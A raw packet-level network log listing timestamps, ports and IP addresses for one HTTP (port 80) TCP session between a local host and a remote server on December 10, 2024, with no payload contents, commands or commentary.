Dec 10, 2024 11:11:10.950371981 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.950412989 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.951350927 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.951411009 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.951476097 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.951520920 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.952466011 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.952507019 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.952513933 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.952544928 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.953578949 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.953625917 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.953721046 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.953768015 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.954617977 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.954663038 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.954735041 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.954772949 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.955739975 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.955804110 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.955935001 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.955981970 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.956861019 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.956899881 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.956932068 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.956975937 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.957958937 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.958008051 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.958072901 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.958116055 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.959053993 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.959111929 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.959177971 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.959223986 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.960169077 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.960220098 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.960238934 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.960283041 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.961255074 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.961304903 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.961380005 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.961426973 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.962342024 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.962394953 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.962475061 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.962522030 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.963454008 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.963501930 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.963537931 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.963583946 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.964561939 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.964608908 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.964638948 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.964683056 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.965643883 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.965681076 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.965692043 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.965739012 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.966767073 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.966814041 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.966852903 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.966898918 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:10.968015909 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:10.968060017 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.102235079 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.102329016 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.102329016 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.102372885 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.102821112 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.102870941 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.102901936 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.102937937 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.104027987 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.104082108 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.104147911 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.104193926 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.104938030 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.104996920 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.105053902 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.105101109 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.106070042 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.106132984 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.106178999 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.106220961 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.107395887 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.107460976 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.107496977 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.107543945 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.108304024 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.108356953 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.108403921 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.108449936 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.109374046 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.109431028 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.109492064 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.109540939 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.110454082 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.110512972 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.110548019 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.110594988 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.111584902 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.111640930 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.111668110 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.111716032 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.112693071 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.112770081 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.112777948 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.112826109 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.113792896 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.113841057 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.114011049 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.114063025 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.114876986 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.114933968 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.115000010 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.115050077 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.116060972 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.116122961 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.116151094 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.116173983 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.117172003 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.117228985 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.117399931 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.117449045 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.118200064 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.118292093 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.118351936 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.119321108 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.119417906 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.119477987 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.120471954 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.120548964 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.120609999 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.121512890 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.121582985 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.121643066 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.122649908 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.122747898 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.122807026 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.123678923 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.123735905 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.123816013 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.124839067 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.124901056 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.125019073 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.125787020 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.125884056 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.126066923 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.126128912 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.126998901 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.127072096 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.127099037 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.127166033 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.128206015 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.128312111 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.128374100 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.129223108 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.129322052 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.129407883 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.130336046 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.130436897 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.130494118 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.131423950 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.131479979 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.131524086 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.131654024 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.132508993 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.132551908 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.132566929 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.132611036 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.133639097 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.133708000 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.133709908 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.133758068 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.134705067 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.134761095 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.134829044 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.134871006 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.135895014 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.135945082 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.136023998 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.136068106 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.136974096 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.137018919 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.137079954 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.137123108 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.138030052 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.138072968 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.138135910 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.138180017 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.139174938 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.139221907 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.139276028 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.139328003 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.140228033 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.140283108 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.140343904 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.140384912 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.141350985 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.141393900 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.141452074 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.141494036 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.142501116 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.142544031 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.142625093 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.142668009 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.143585920 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.143630028 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.143737078 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.143780947 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.144671917 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.144712925 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.144736052 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.144778967 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.145760059 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.145828009 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.145828962 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.145869970 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.146850109 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.146893978 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.146977901 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.147022009 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.147985935 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.148056030 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.148164988 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.148221970 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.149066925 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.149127960 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.149213076 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.149281979 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.150151968 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.150249004 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.150290012 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.151294947 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.151498079 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.151547909 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.152383089 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.152472973 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.152514935 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.153476954 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.153517962 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.153601885 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.153790951 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.154571056 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.154614925 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.154685974 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.154725075 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.155704975 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.155745029 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.155787945 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.156824112 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.156866074 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.156925917 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.157891035 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.157938004 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.157989025 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.158021927 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.158989906 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.159070969 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.159126997 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.160063028 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.162331104 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.294258118 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.294363022 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.294456005 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.294779062 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.294979095 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.295027971 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.295079947 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.295135021 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.296032906 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.296183109 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.296227932 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.297297955 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.297374964 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.297419071 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.298299074 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.298401117 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.298440933 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.299348116 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.299473047 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.299521923 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.300442934 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.300482988 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.300565004 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.301585913 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.301624060 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.301789045 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.302738905 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.302786112 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.302845955 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.303916931 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.303956985 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.303961992 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.304934025 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.304976940 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.305001974 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.305038929 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.306019068 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.306101084 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.306139946 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.307120085 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.307264090 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.307320118 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.308264017 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.308506012 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.308549881 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.309556961 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.309596062 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.309653044 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.309734106 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.310482979 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.310522079 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.310564995 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.310604095 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.311517000 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.311558962 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.311600924 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.311639071 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.312630892 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.312669039 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.312733889 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.313729048 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.313771009 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.313839912 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.314806938 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.314848900 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.314872980 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.314914942 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.316035032 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.316173077 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.316216946 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.317064047 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.317152977 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.317193985 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.318094969 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.318206072 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.318242073 CET	49828	80	192.168.2.5	31.41.244.11
Dec 10, 2024 11:11:11.319231987 CET	80	49828	31.41.244.11	192.168.2.5
Dec 10, 2024 11:11:11.319282055 CET	49828	80	192.168.2.5	31.41.244.11
